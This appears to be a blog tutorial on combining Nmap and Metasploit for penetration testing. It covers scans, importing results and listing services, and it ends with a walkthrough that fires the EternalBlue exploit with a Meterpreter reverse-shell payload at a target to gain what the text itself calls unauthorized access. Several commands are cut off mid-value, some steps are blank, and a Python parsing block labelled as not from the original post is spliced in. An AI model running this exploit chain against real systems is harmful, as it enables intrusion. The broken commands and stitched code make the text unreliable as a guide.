What are Metasploit and Nmap?

The Metasploit Nmap Scanner module integrates Nmap's network discovery features into Metasploit, allowing security engineers to efficiently scan for devices, open ports, and vulnerabilities and assess them for security testing.

Insha

The Nmap Scanner module in Metasploit enables security professionals to leverage Nmap's robust network discovery capabilities directly within the Metasploit framework. By integrating Nmap, users can efficiently scan networks, identify devices, open ports, and services, and then immediately use Metasploit to assess vulnerabilities found during the scan.

This blog post explains how to use the Metasploit Nmap Scanner for penetration testing. It provides step-by-step guides on how to incorporate Nmap scans into Metasploit and exploit the identified vulnerabilities.

Understanding Nmap

Nmap is a tool that helps scan networks and find potential security issues. It identifies open ports, services, and devices connected to a network, making it easier to see what’s running and where. Security professionals use Nmap to map network structures, check for vulnerabilities, and understand how systems communicate.

It's simple to use and can quickly scan large networks. Security engineers can customize Nmap scans based on specific needs, whether it's a basic overview or a deep dive. With Nmap, they can strengthen networks and identify threats early.

Understanding Metasploit

Metasploit is a powerful tool for testing and finding vulnerabilities in networks and applications. It helps security professionals simulate real-world cyberattacks to identify weak points. With Metasploit, it’s possible to discover security flaws, develop exploit code, and test systems for potential breaches.

Its framework supports a wide range of attacks, making it a favorite for penetration testing. The tool simplifies the process of finding and exploiting vulnerabilities, allowing security teams to improve defenses. By actively testing systems, Metasploit plays a crucial role in strengthening cybersecurity.

What is the Metasploit Nmap Scanner?

The Metasploit Nmap Scanner is an auxiliary module within the Metasploit framework that integrates Nmap's network scanning capabilities directly into Metasploit. This module allows security engineers to perform network scans using Nmap from within Metasploit, providing a seamless experience for identifying and targeting vulnerabilities.

Features of Metasploit Nmap Scanner

The Metasploit Nmap Scanner offers several key features that enhance network scanning and vulnerability assessment capabilities:

Integration with Nmap

Security teams can run Nmap scans directly from within the Metasploit console. This integration lets them use Nmap's powerful network discovery features without leaving Metasploit, which improves the overall efficiency of vulnerability assessments and removes the friction of moving from scanning to exploitation.

Convenience

Initiating Nmap scans within the Metasploit console saves time by avoiding the need to switch between tools. This integration allows security teams to manage the entire process in one place. It simplifies penetration testing by keeping all operations centralized. They can run scans, analyze results, and exploit vulnerabilities efficiently.

Enhanced Workflow

The Metasploit Nmap Scanner ensures a smooth transition from scanning to exploitation. Once security teams run the Nmap command, they can immediately act on the results within Metasploit. This integration helps streamline the workflow and boosts productivity, allowing a direct shift from network discovery to identifying and exploiting vulnerabilities.

Detailed Network Discovery

With the Nmap Scanner, security teams can gather detailed data about devices, open ports, and services on the network. This feature enables precise targeting for further security testing. Having detailed network information helps in identifying the most vulnerable entry points. It improves the effectiveness of penetration tests.

Automation and Scripting

Security teams can automate Nmap scans and integrate them into Metasploit scripts for repeatable tasks. This feature makes it easy to run scans across large environments without manual effort. Automating the scanning process boosts both accuracy and speed. It’s particularly useful for large-scale penetration tests in complex networks.

Using Metasploit Nmap Scanner to Scan Targets

Discover the power of integrated network scanning by leveraging the Metasploit Nmap Scanner module to enhance penetration testing capabilities.

Metasploit Nmap Scanner

Metasploit includes a module that allows security teams to integrate Nmap scans directly within the Metasploit framework. Here’s how to do it.

Start Metasploit

Launch the Metasploit Framework by using the msfconsole command. This starts the console where security teams can access all the Metasploit tools and modules.

Select the Nmap Scanner Module

Choose the Nmap Scanner module from Metasploit's auxiliary tools. This module allows the running of network scans using Nmap within the Metasploit framework.

Set the Target IP

Specify the IP address or range of the target system by setting the RHOSTS option. This tells the Nmap scanner which network or system to scan.

set

Run the Scan

Execute the Nmap scan by using the run command. This initiates the scanning process, providing details on the network, open ports, and services.

Example Commands

Execute these commands to perform a basic Nmap scan using Metasploit:

msfconsole 
use auxiliary/scanner/portscan/nmap 
set RHOSTS 192

Importing Nmap Scan Results into Metasploit

After conducting an Nmap scan, import the results into Metasploit to analyze and exploit the discovered vulnerabilities.

Perform an Nmap Scan and Save the Results

Run an Nmap scan with -sV to detect service versions, and save the results in XML format using -oX. This step captures the scan data in a format Metasploit can import.

nmap -sV -oX

Start Metasploit

Launch Metasploit by running msfconsole, which opens the framework for further analysis of the scanned results.

Import the Nmap Results

Use the db_import command to import the Nmap scan results into Metasploit for further analysis. This loads the discovered hosts, services, and vulnerabilities into the Metasploit database.

Verify the Import

After importing, review the loaded hosts and services with Metasploit commands such as hosts or services to confirm that the scan data loaded correctly.

How to Identify Targets and Vulnerabilities?

Once the security teams have imported Nmap data into Metasploit, they can use it to identify potential targets and vulnerabilities.

List Hosts

Use the hosts command to list all hosts identified during the scan. This lets security engineers review which systems were discovered on the network.

List Services on a Specific Host

To view the services running on a specific host, use the services -p [port_number] -R command. This shows the services that are active on the chosen port for that host.

services -p [port_number] -R

Search for Exploits Related to Discovered Services

After identifying services, search for exploits that target those services using the relevant Metasploit search commands. This step helps find vulnerabilities related to the services running on the hosts.
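The import and target-identification steps above both rely on the XML report that nmap -oX writes. The following added example (not code from the original post or from Metasploit) parses such a report the way db_import does, keeping only hosts that are up and ports that are open, and then reproduces the hosts and services -p [port_number] views over the result. The XML document is a constructed sample, not a real scan.

```python
# Added example, not code from the original post or from Metasploit itself:
# parse an Nmap -oX report the way db_import does, then reproduce the
# "hosts" and "services -p <port>" views. The XML is a constructed sample.
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 10.0.0.0/30">
 <host><status state="up"/><address addr="10.0.0.1" addrtype="ipv4"/>
  <hostnames><hostname name="gw.example.test" type="PTR"/></hostnames>
  <ports>
   <port protocol="tcp" portid="22"><state state="open"/>
    <service name="ssh" product="OpenSSH" version="9.2p1"/></port>
   <port protocol="tcp" portid="445"><state state="open"/>
    <service name="microsoft-ds"/></port>
   <port protocol="tcp" portid="80"><state state="closed"/></port>
  </ports></host>
 <host><status state="up"/><address addr="10.0.0.2" addrtype="ipv4"/>
  <ports><port protocol="tcp" portid="445"><state state="open"/>
    <service name="microsoft-ds" product="Samba smbd" version="4.6.2"/></port>
  </ports></host>
 <host><status state="down"/><address addr="10.0.0.3" addrtype="ipv4"/></host>
</nmaprun>"""


def parse_nmap_xml(xml_text):
    """Map each live host's IPv4 address to its hostname and open services.
    Down hosts and non-open ports are dropped, mirroring what db_import keeps."""
    hosts = {}
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue
        hn = host.find("hostnames/hostname")
        services = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            attrs = svc.attrib if svc is not None else {}
            services.append((int(port.get("portid")), port.get("protocol"),
                             attrs.get("name"), attrs.get("product"), attrs.get("version")))
        hosts[addr.get("addr")] = {"hostname": hn.get("name") if hn is not None else None,
                                   "services": services}
    return hosts


def services_on_port(hosts, port):
    """Equivalent of `services -p <port>`: IPs with that port open."""
    return sorted(ip for ip, h in hosts.items() if any(s[0] == port for s in h["services"]))
```

The same two functions work unchanged on a real report produced with nmap -sV -oX scan.xml, since they read only the host, address, ports and service elements Nmap always emits.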

Full Penetration Test Using Both Nmap and Metasploit

Let's dive into the step-by-step process of conducting a comprehensive penetration test using the powerful combination of Nmap and Metasploit. Steps include:

Perform an Initial Nmap Scan

Run an Nmap scan with the -A option to gather detailed information about the target. Save the scan results in XML format for later use in Metasploit.

nmap -A -oX

Import Nmap Results into Metasploit

Start Metasploit by running msfconsole. Then, import the Nmap scan results using the db_import command to load the scan data into Metasploit.



Identify and Analyze Hosts

Use the hosts command to list all discovered hosts and the services command to view active services on those hosts. This helps security engineers analyze the scanned data for potential vulnerabilities.



Search and Select an Exploit

Search for vulnerabilities by using the search command with a specific vulnerability name. Once found, select the relevant exploit by using the use command with the exploit path.



Set Exploit Options and Run

Set the target IP with set RHOST, specify the payload with set PAYLOAD, and set the listener address (the tester's own machine) with set LHOST. Finally, run the exploit.

set RHOST [target_ip] 
set PAYLOAD [payload_name] 
set

Example Commands

Execute the following commands to perform a comprehensive penetration test using Nmap and Metasploit:

nmap -A -oX initial_scan.xml 192.168.1.1 
msfconsole 
db_import initial_scan.xml 
hosts 
services 
search smb 
use exploit/windows/smb/ms17_010_eternalblue 
set RHOST 192.168.1.1 
set PAYLOAD windows/x64/meterpreter/reverse_tcp 
set LHOST 192

This sequence of commands performs a penetration test by scanning a target, identifying vulnerabilities, and attempting an exploit. First, the nmap command scans the target IP (192.168.1.1), gathering information about services, operating systems, and potential vulnerabilities, and saving the results as an XML file (initial_scan.xml).

Next, the user starts the Metasploit Framework with msfconsole and imports the scan results using db_import initial_scan.xml to analyze the target further. The hosts and services commands display the discovered hosts and services from the scan.

The user then searches for vulnerabilities related to SMB with the search smb command and selects the EternalBlue exploit by running use exploit/windows/smb/ms17_010_eternalblue. The user sets the target IP with set RHOST 192.168.1.1, and the payload is chosen as Meterpreter reverse TCP with set PAYLOAD windows/x64/meterpreter/reverse_tcp.

The attacker's IP is specified with set LHOST 192.168.1.100, which sets up the reverse connection. Finally, the run command executes the exploit, attempting to gain unauthorized access to the target system and establish a remote connection.

Final Thoughts

Combining Nmap and Metasploit is a powerful strategy for conducting effective penetration tests. Nmap’s ability to scan networks, identify open ports, and uncover vulnerabilities, combined with Metasploit’s extensive exploit library, streamlines the process from discovery to exploitation. This integration not only enhances efficiency but also improves the depth of security assessments, making it easier to pinpoint weaknesses in the organization’s systems.
